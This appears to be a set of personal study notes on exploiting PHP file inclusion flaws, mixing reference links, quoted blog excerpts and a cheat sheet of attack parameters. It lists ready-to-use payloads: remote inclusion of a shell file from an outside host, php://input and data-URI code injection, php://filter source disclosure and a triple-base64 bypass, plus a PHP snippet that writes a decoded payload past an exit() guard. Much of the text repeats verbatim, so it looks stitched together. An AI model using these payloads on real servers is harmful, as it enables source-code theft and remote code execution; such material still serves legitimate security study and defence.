Exploiting PHP File inclusion Vulnerabilities
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ VERY VERY USEFUL!
"
http://diablohorn.wordpress.com/2010/01/16/interesting-local-file-inclusion-method/
"
p.s Don’t forget this is also a very nice way to download binary files, since they first get base64 encoded."
Good links met during the studies:
http://blog.php-security.org/archives/45-PHP-5.2.0-and-allow_url_include.html
http://gynvael.coldwind.pl/?id=376
Other links I read
http://blog.nearlyfreespeech.net/2009/11/05/a-php-include-exploit-explained/
http://seclists.org/fulldisclosure/2009/Dec/204
http://www.suspekt.org/page/2/
http://upshell.wordpress.com/category/skill/
http://www.xoops.org/modules/newbb/viewtopic.php?topic_id=66247
http://php.net/manual/en/wrappers.data.php
http://www.php.net/manual/en/wrappers.php.php
//This can be useful source: http://sla.ckers.org/forum/read.php?16,33245,33449
ok, php://input wont work either because of the appended .htm and the fact that you cant use null bytes (probably magic_quotes_gpc=on). besides null bytes you could also try techniques described here:
http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
but they likely fail.
another cool trick is to encode your payload 3 times and then decode it 3 times using php://filter. any non-ascii chars (and if you decode .htm it will end in those) will be stripped by 3 times decoding due to the character set of base64:
php://filter/write=convert.base64-decode/resource=php://filter/write=convert.base64-decode/resource=php://filter/write=convert.base64-decode/resource=YOUR_PAYLOAD_BASE64_ENCODED_3TIMES
the appended .htm will then get removed automatically by decoding 3 times. your payload will survive because you have encoded it 3 times.
// For the below one I didn't find any implementation
php
$shellcode='PD9waHBpbmZvKCk7Pz4';// base64_decode
$endstr='s';
$timestamp=$endstr.$shellcode;
file_put_contents("php://filter/write=convert.base64-decode/resource=ryat.php","PHP exit('Access Denied'); ?>\t$timestamp");
?>
"
- Including Remote Code:
?file=[http|https|ftp]://websec.wordpress.com/shell.txt
(requires allow_url_fopen=On and allow_url_include=On) - Using PHP stream php://input:
?file=php://input
(specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On) - Using PHP stream php://filter:
?file=php://filter/convert.base64-encode/resource=index.php
(lets you read PHP source because it wont get evaluated in base64. More details here and here) - Using data URIs:
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
(requires allow_url_include=On) - Using XSS:
?file=http://127.0.0.1/path/xss.php?xss=phpcode
(makes sense if firewalled or only whitelisted domains allowed)
http://diablohorn.wordpress.com/2010/01/16/interesting-local-file-inclusion-method/
"
So I could have stopped and given up…then again that would mean ignoring the reminder I just got about thinking outside the box. I decided to go ahead and see if I could maybe abuse any of the PHP features to at least view some sourcecode of local PHP files. So I started to play around with the PHP filter wrapper, since according to the documentation the other ones like memory/temp/input where protected by allow_url_include. An excerpt from the documentation:
php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read.
So if I understand this correctly it means that I can alter the stream content BEFORE the calling function gets to work with it. Now that’s fun, so after some toying around with it and figuring out stuff(which filters it supports and such), the following command can be used to get the source of the PHP files on the server.
http://www.somesite.com/?page=php://filter/convert.base64-encode/resource=in.php
The output from the above URL is the base64 encoded content of the in.php file. YEAH BABY! Now I can go hunt for bugs in other PHP files available on the server.
Here are the references I used while researching this:
- The POST DATA method
- PHP Protocol Wrappers documentation
- PHP Filter documentation
p.s Don’t forget this is also a very nice way to download binary files, since they first get base64 encoded."
Good links met during the studies:
http://blog.php-security.org/archives/45-PHP-5.2.0-and-allow_url_include.html
http://gynvael.coldwind.pl/?id=376
Other links I read
http://blog.nearlyfreespeech.net/2009/11/05/a-php-include-exploit-explained/
http://seclists.org/fulldisclosure/2009/Dec/204
http://www.suspekt.org/page/2/
http://upshell.wordpress.com/category/skill/
http://www.xoops.org/modules/newbb/viewtopic.php?topic_id=66247
http://php.net/manual/en/wrappers.data.php
http://www.php.net/manual/en/wrappers.php.php
//This can be useful source: http://sla.ckers.org/forum/read.php?16,33245,33449
ok, php://input wont work either because of the appended .htm and the fact that you cant use null bytes (probably magic_quotes_gpc=on). besides null bytes you could also try techniques described here:
http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
but they likely fail.
another cool trick is to encode your payload 3 times and then decode it 3 times using php://filter. any non-ascii chars (and if you decode .htm it will end in those) will be stripped by 3 times decoding due to the character set of base64:
php://filter/write=convert.base64-decode/resource=php://filter/write=convert.base64-decode/resource=php://filter/write=convert.base64-decode/resource=YOUR_PAYLOAD_BASE64_ENCODED_3TIMES
the appended .htm will then get removed automatically by decoding 3 times. your payload will survive because you have encoded it 3 times.
// For the below one I didn't find any implementation
php
$shellcode='PD9waHBpbmZvKCk7Pz4';// base64_decode
$endstr='s';
$timestamp=$endstr.$shellcode;
file_put_contents("php://filter/write=convert.base64-decode/resource=ryat.php","PHP exit('Access Denied'); ?>\t$timestamp");
?>